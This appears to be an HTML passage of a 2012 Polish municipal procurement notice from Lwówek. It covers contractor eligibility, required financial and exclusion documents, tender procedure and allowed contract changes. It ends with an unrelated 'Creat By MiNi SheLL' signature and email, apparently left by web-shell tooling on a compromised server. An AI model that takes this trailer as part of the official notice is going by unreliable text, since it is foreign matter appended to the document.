W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał osobowy.

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.
Z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnia przedstawione wyżej warunki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią wykonawcy, którzy :                                                                                                   
-  posiadają opłaconą polisę, potwierdzającą, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 40% wartość przewidywanego przedmiotowego kontraktu (przedmiotowej umowy)                                                                                                                                  -  posiadają środki finansowe, lub zdolność kredytową na kwotę nie mniejszą niż 40% wartości  przewidywanego przedmiotowego kontraktu (przedmiotowej umowy),                                                                                                                                         

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku.

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.
Z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnia przedstawione wyżej warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia umowy zawarto w projekcie umowy, który stanowi zał. nr 4 do siwz.  
                                                                                                                                                                  Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: tak
Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 
Zmiana terminu realizacji przedmiotu umowy. 
1. Zmiany terminu wykonania zamówienia w następujących przypadkach:                                               - wystąpienia siły wyższej, siła wyższa oznacza wydarzenia nieprzewidywalne i poza kontrolą stron zawartej umowy, występujące po jej podpisaniu, a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzmieniu,                                                                                                                                                    - innych uzasadnionych przyczyn i okoliczności, korzystnych dla Zamawiającego, pod warunkiem, że zaszły okoliczności których nie można było przewidzieć w chwili zawarcia umowy.
                                                                                      
2. Zmian przewidzianych w Prawie budowlanym:                                                                                               1) art. 23, pkt 1, jeżeli są uzasadnione koniecznością zwiększenia bezpieczeństwa wykonania robót budowlanych lub usprawnianie procesu budowy,                                                                                                    2) art. 20, ust. 1, pkt 4, lit. B - po uzgodnieniu możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego, albo                                                                                                                                     3) gdy zmiany dokonane zostały podczas wykonywania robót i nie odstępują w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36a, ust. 5 lub dokonane zostały zgodnie z zapisami art. 36a, ust. 6 ustawy z zastrzeżeniem art. 57, ust. 2 Prawo budowlane. 
                                                                                                                                                 
3. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego w szczególności:               1) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej usprawniających funkcjonowanie całego układu rozbudowy i modernizacji,                                                             2) odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych.                                                                    W przypadku wystąpienia okoliczności wymienionych powyżej termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.                                                          W razie nie zgłoszenia przez Wykonawcę zamawiającemu w terminie nie później niż 3 dni od zaistnienia wyżej wskazanych wyżej przyczyn i okoliczności, Wykonawca zobowiązany będzie do dotrzymania terminów umownych.    

4. Wystąpienie robót zamiennych; ewentualne roboty zamienne, realizowane będą na podstawie zatwierdzonych przez inspektora nadzoru inwestorskiego i Zamawiającego protokołów konieczności oraz wprowadzeniu ewentualnych, uzasadnionych zmian przez Projektanta.       
                                                                                                                                             
5. Wystąpienie robót dodatkowych niezbędnych do prawidłowego wykonania realizowanego zamówienia, niezawinionych przez Wykonawcę. W przypadku wystąpienia okoliczności stanowiących podstawę zmian postanowień umowy Wykonawca zobowiązany jest do niezwłocznego, nie później niż w dniu następnym od zaistnienia przyczyn do wykonania robot dodatkowych, poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.

6. W razie zaistnienia istotnych okoliczności wskazujących na wprowadzenie zmian korzystnych dla Zamawiającego, czego nie można było przewidzieć w chwili zawarcia umowy, po pisemnym udokumentowaniu tych zmian, oraz po uzyskaniu akceptacji Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lwowek.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Lwówku, ul. Ratuszowa 2, 64-310 Lwówek, pok. nr 10, bezpłatnie na nośniku elektronicznym - płyta CD..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy w Lwówku, ul. Ratuszowa 2, pokój nr 5 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com